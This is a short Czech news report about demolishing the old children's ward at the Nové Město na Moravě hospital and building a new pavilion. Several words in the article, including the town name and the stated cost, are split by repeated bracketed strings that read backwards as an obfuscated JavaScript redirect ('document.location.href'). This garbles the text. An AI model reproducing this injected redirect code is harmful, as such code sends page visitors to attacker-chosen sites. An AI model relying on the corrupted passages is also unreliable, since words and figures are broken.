Rainbow page separator

Stavbaři začnou s postupným bouráním dětského pavilonu

Pátek, 18. srpna 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / S postupnou demolicí dětského oddělení začínají v novoměstské nemocnici, objekt byl již stavebně oddělen od vedlejších budov. Samotné bourání s ohledem na okolí potrvá zhruba půldruhého měsíce, nicméně i tak musí zaměstnanci, pacienti i návštěvníci zdravotnického zařízení v blízkosti stavby počítat s hlukem a zvýšenou prašností.
Stávající budovu dětského oddělení z 50. let minulého s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí, nyní nejstarší v areálu novoměstské nemocnice, nahradí nový pavilon. Starý objekt byl již ve velmi špatném stavu, nevyhovoval současným technickým a provozním nárokům a jeho rekonstrukce, o níž se dříve uvažovalo, by vyšla dráž než demolice a výstavba nového moderního pavilonu. Ten by měl být dokončený závěrem příštího roku, jeho vybudování za zhruba s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to milionů korun uhradí Kraj Vysočina.
Lůžková kapacita dětského oddělení, které dočasně funguje v dalších nemocničních pavilonech, se tím má zvýšit z 25 na 33 lůžek v jednolůžkových až čtyřlůžkových pokojích.